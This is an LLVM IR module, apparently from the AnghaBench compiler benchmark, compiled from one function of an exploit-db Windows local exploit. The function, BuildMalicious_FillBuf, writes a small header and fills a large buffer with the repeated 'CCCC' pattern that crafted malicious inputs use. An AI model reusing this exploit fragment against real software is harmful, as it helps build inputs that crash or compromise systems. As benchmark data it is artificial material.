; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_24207.c_BuildMalicious_FillBuf.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_24207.c_BuildMalicious_FillBuf.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@BuildMalicious_FillBuf.buf = internal global [16416 x i32] zeroinitializer, align 16

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32* @BuildMalicious_FillBuf() #0 {
  %1 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %2 = call i32 @WriteWord(i32 82)
  %3 = call i32 @WriteWord(i32 0)
  %4 = call i32 @WriteDword(i32 0)
  %5 = call i32 @WriteDword(i32 16384)
  br label %6

6:                                                ; preds = %9, %0
  %7 = call i64 (...) @BufRemaining()
  %8 = icmp ne i64 %7, 0
  br i1 %8, label %9, label %11

9:                                                ; preds = %6
  %10 = call i32 @WriteDword(i32 1128481603)
  br label %6

11:                                               ; preds = %6
  ret i32* getelementptr inbounds ([16416 x i32], [16416 x i32]* @BuildMalicious_FillBuf.buf, i64 0, i64 0)
}

declare dso_local i32 @WriteWord(i32) #1

declare dso_local i32 @WriteDword(i32) #1

declare dso_local i64 @BufRemaining(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
